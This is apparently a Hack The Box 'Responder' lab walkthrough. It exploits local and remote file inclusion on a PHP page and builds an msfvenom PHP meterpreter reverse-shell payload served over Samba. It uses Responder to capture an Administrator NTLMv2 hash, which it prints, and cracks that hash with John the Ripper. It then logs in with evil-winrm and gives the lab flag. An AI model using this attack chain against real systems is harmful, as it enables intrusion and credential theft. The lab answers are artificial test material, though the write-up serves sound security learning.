HTB - Starting Point: Responder - writeup:
Target IP Address:
10.129.17.20
export IP="10.129.17.20"
Tasks
Task1: When visiting the web service using the IP address, what is the domain that we are being redirected to?
1
2
| curl $IP
<meta http-equiv="refresh" content="0;url=http://unika.htb/">
|
A: unika.htb
Task2: Which scripting language is being used on the server to generate webpages?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| sudo nikto -h http://$IP
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = "",
LC_ALL = (unset),
LANG = "de_DE.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.128.80
+ Target Hostname: 10.129.128.80
+ Target Port: 80
+ Start Time: 2022-09-13 15:56:59 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
+ Retrieved x-powered-by header: PHP/8.1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
|
A: PHP
Task3: What is the name of the URL parameter which is used to load different language versions of the webpage?
A: page
Task4: Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
I was able to exploit LFI like so:
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
A: http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
Task5: Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
A: //10.10.14.6/somefile
Task6: What does NTLM stand for?
A: New Technology LAN Manager
Task7: Which flag do we use in the Responder utility to specify the network interface?
A: -I
A: John the Ripper
Task9: What is the password for the administrator user?
For this task we will need the tool responder.
1
| git clone https://github.com/lgandx/Responder
|
I was able to run responder and capture hashes by using RFI to sideload a php meterpreter file and ultimately gaining a shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
| cd Responder
sudo responder -i 10.10.16.156 -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.156]
Responder IPv6 [dead:beef:4::109a]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-56MT5U5SZ1U]
Responder Domain Name [8EZQ.LOCAL]
Responder DCE-RPC Port [49418]
[+] Listening for events...
|
Let’s create a php payload with msfvenom and host it on our machine so we can sideload it through SMB!
1
2
3
4
5
6
| msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.156 LPORT=4444 -o payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1113 bytes
Saved as: payload.php
|
We will need to exploit this using Samba since url_fopen is disabled in php we cannot easily exploit RFI here.
(https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
Now I will need to setup samba so we can sideload the exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| apt-get install samba
mkdir /var/www/html/pub/
chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/
echo > /etc/samba/smb.conf
echo "[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody" > /etc/samba/smb.conf
service smbd restart
cp payload.php /var/www/html/pub
|
After pointing my browser to http://unika.htb/index.php?page=\\10.10.16.156\ica\payload.phpI got a meterpreter shell!
1
2
3
4
5
| [*] Started reverse TCP handler on 10.10.16.156:4444
[*] Sending stage (39927 bytes) to 10.129.128.80
[*] Meterpreter session 1 opened (10.10.16.156:4444 -> 10.129.128.80:49482) at 2022-09-13 16:49:37 +0200
meterpreter >
|
At the same time, I can capture a connection and dump NTLMv2 hashes with Responder:
1
2
3
4
5
6
7
| [SMB] NTLMv2-SSP Client : 10.129.17.20
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:6b65ae6b782b3399:09D597B083E4F1DF38284708ABA04FF5:010100000000000080EBBCED97C7D801950D5D5965F82A570000000002000800380045005A00510001001E00570049004E002D00350036004D00540035005500350053005A003100550004003400570049004E002D00350036004D00540035005500350053005A00310055002E00380045005A0051002E004C004F00430041004C0003001400380045005A0051002E004C004F00430041004C0005001400380045005A0051002E004C004F00430041004C000700080080EBBCED97C7D80106000400020000000800300030000000000000000100000000200000436D29F868457D28FCAC25E68C0588549FE2A0096D761D40A34735311B31BE5E0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100350036000000000000000000
[*] Skipping previously captured hash for RESPONDER\Administrator
[*] Skipping previously captured hash for RESPONDER\Administrator
[*] Skipping previously captured hash for RESPONDER\Administrator
[*] Skipping previously captured hash for RESPONDER\Administrator
|
I saved the ntlm2 hash to a file ntlm2_hash and now I will try to crack the hash using John the Ripper!
1
2
3
4
5
6
7
8
9
| john ntlm2_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-09-13 17:55) 11.11g/s 45511p/s 45511c/s 45511C/s 123456..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
|
I am using the password list
rockyou.txt here because it contains the most commonly used passwords.
john was immediately able to crack the hash.
The password of the Administrator account is badminton
Task10: We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
A: 5985
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| nmap -v 10.10.16.156 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 18:03 CEST
Initiating Ping Scan at 18:03
Scanning 10.10.16.156 [2 ports]
Completed Ping Scan at 18:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:03
Completed Parallel DNS resolution of 1 host. at 18:03, 0.00s elapsed
Initiating Connect Scan at 18:03
Scanning 10.10.16.156 [65535 ports]
Discovered open port 139/tcp on 10.10.16.156
Discovered open port 3389/tcp on 10.10.16.156
Discovered open port 53/tcp on 10.10.16.156
Discovered open port 443/tcp on 10.10.16.156
Discovered open port 445/tcp on 10.10.16.156
Discovered open port 25/tcp on 10.10.16.156
Discovered open port 110/tcp on 10.10.16.156
Discovered open port 80/tcp on 10.10.16.156
Discovered open port 21/tcp on 10.10.16.156
Discovered open port 135/tcp on 10.10.16.156
Discovered open port 587/tcp on 10.10.16.156
Discovered open port 143/tcp on 10.10.16.156
Discovered open port 5986/tcp on 10.10.16.156
Discovered open port 88/tcp on 10.10.16.156
Discovered open port 45107/tcp on 10.10.16.156
Discovered open port 5985/tcp on 10.10.16.156
Discovered open port 389/tcp on 10.10.16.156
Discovered open port 1433/tcp on 10.10.16.156
Completed Connect Scan at 18:03, 1.87s elapsed (65535 total ports)
Nmap scan report for 10.10.16.156
Host is up (0.00012s latency).
Not shown: 65517 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
587/tcp open submission
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
5985/tcp open wsman
5986/tcp open wsmans
45107/tcp open unknown
|
On port 5985 is the service wsman running. wsman stands for WS-Management. This is a WinRM service. This provides access to Web Services for Management.
Submit root flag
Let’s grab Evil-WinRm!
1
| git clone https://github.com/Hackplayers/evil-winrm
|
We are going to run Responder again so it can listen for requests.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
| cd Responder
sudo python3 Responder.py -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.156]
Responder IPv6 [dead:beef:4::109a]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-S84T8YLFEZG]
Responder Domain Name [AJ0U.LOCAL]
Responder DCE-RPC Port [47321]
[+] Listening for events...
|
Next we need to connect with evil-winrm to the winrm service running on the target machine!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
| cd evil-winrm
./evil-winrm.rb -i 10.129.17.20 -u administrator -p badminton
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/9/2022 5:35 PM Administrator
d----- 3/9/2022 5:33 PM mike
d-r--- 10/10/2020 12:37 PM Public
*Evil-WinRM* PS C:\Users> cd mike
*Evil-WinRM* PS C:\Users\mike> ls
Directory: C:\Users\mike
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2022 4:51 AM Desktop
*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> ls
Directory: C:\Users\mike\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2022 4:50 AM 32 flag.txt
*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
|
root flag: ea81b7afddd03efaa0945333ed147fac
That’s it!
Thanks for tuning in !
